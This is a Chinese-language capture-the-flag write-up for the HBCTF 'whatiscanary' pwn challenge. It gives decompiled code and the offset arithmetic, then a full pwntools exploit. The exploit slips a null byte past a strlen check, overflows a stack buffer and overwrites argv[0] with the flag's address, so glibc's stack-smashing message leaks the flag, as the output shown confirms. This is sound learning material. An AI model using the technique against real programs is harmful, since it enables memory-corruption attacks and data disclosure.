HBCTF whatiscanary

开始做之前不知道是简单题，因为没看wp，既然做了，就发出来吧

exp之前

NX + CANARY

CANARY很多时候直接覆盖argv即可

gdb-peda$ checksec 
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

main函数，两个函数，一个读取flag文件到bss全局变量上，另一个是漏洞函数

int __cdecl main()
{
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  puts("hello, welcome to HBCTF!");
  openFlag(&unk_804A0A0);
  vuln();
  puts("exit");
  return 0;
}

漏洞函数，name存在溢出，不过有strlen检测，这个00截断，很容易绕过

int vuln()
{
  char name; // [sp+Ch] [bp-2Ch]@1
  int v2; // [sp+2Ch] [bp-Ch]@1

  v2 = *MK_FP(__GS__, 20);
  printf("input your name(length < 10):");
  sub_804878A(&name);
  if ( (signed int)strlen(&name) > 10 )
  {
    puts("error, will exit!");
    exit(0);
  }
  printf("hello, '%s', wish you have a good result!\n", &name);
  return *MK_FP(__GS__, 20) ^ v2;
}

开始

本地测试先生成flag文件

echo "flag{whatiscanary}" > flag

我们运行起来看看，看看flag是不是在那

gdb-peda$ x /s 0x804A0A0
0x804a0a0:	"flag{whatiscana"...

由于canary会输出argv中的程序名，那么这题覆盖argv为flag地址即可

偏移计算

char name; // [sp+Ch] [bp-2Ch]@1

python手算

>>> 0x2c
44
>>> 44+4
48

其中4为ebp占用4字节

所以最终payload

# -*- coding: utf-8 -*-
from pwn import *
p = process('./whatiscanary')

p.recvuntil("hello, welcome to HBCTF!\n")
p.recvuntil("input your name(length < 10):")

flag_addr = 0x804A0A0

payload = "aaaa\x00" 
payload += "a" * (48 - len(payload))
payload += p32(flag_addr) * 100

p.sendline(payload)

p.interactive()

结果：

root@kali:~/learn/pwn/HBCTFwhatiscanary# python exp.py 
[+] Starting local process './whatiscanary': pid 22162
[*] Switching to interactive mode
hello, 'aaaa', wish you have a good result!
*** stack smashing detected ***: flag{whatiscanary}
 terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x698aa)[0xf76398aa]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xf76cc9e7]
/lib/i386-linux-gnu/libc.so.6(+0xfc9a8)[0xf76cc9a8]
flag{whatiscanary}
[0x8048851]
flag{whatiscanary}
[0x804a0a0]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:01 527067                             /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
08049000-0804a000 r--p 00000000 08:01 527067                             /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
0804a000-0804b000 rw-p 00001000 08:01 527067                             /root/learn/pwn/HBCTFwhatiscanary/whatiscanary
09839000-0985a000 rw-p 00000000 00:00 0                                  [heap]
f75d0000-f7787000 r-xp 00000000 08:01 1316984                            /lib/i386-linux-gnu/libc-2.25.so
f7787000-f7788000 ---p 001b7000 08:01 1316984                            /lib/i386-linux-gnu/libc-2.25.so
f7788000-f778a000 r--p 001b7000 08:01 1316984                            /lib/i386-linux-gnu/libc-2.25.so
f778a000-f778b000 rw-p 001b9000 08:01 1316984                            /lib/i386-linux-gnu/libc-2.25.so
f778b000-f778e000 rw-p 00000000 00:00 0 
f7793000-f77ae000 r-xp 00000000 08:01 1331725                            /lib/i386-linux-gnu/libgcc_s.so.1
f77ae000-f77af000 r--p 0001a000 08:01 1331725                            /lib/i386-linux-gnu/libgcc_s.so.1
f77af000-f77b0000 rw-p 0001b000 08:01 1331725                            /lib/i386-linux-gnu/libgcc_s.so.1
f77b0000-f77b4000 rw-p 00000000 00:00 0 
f77b4000-f77b6000 r--p 00000000 00:00 0                                  [vvar]
f77b6000-f77b8000 r-xp 00000000 00:00 0                                  [vdso]
f77b8000-f77db000 r-xp 00000000 08:01 1315428                            /lib/i386-linux-gnu/ld-2.25.so
f77db000-f77dc000 r--p 00022000 08:01 1315428                            /lib/i386-linux-gnu/ld-2.25.so
f77dc000-f77dd000 rw-p 00023000 08:01 1315428                            /lib/i386-linux-gnu/ld-2.25.so
ff7f3000-ff814000 rw-p 00000000 00:00 0                                  [stack]
[*] Process './whatiscanary' stopped with exit code -6 (SIGABRT) (pid 22162)
[*] Got EOF while reading in interactive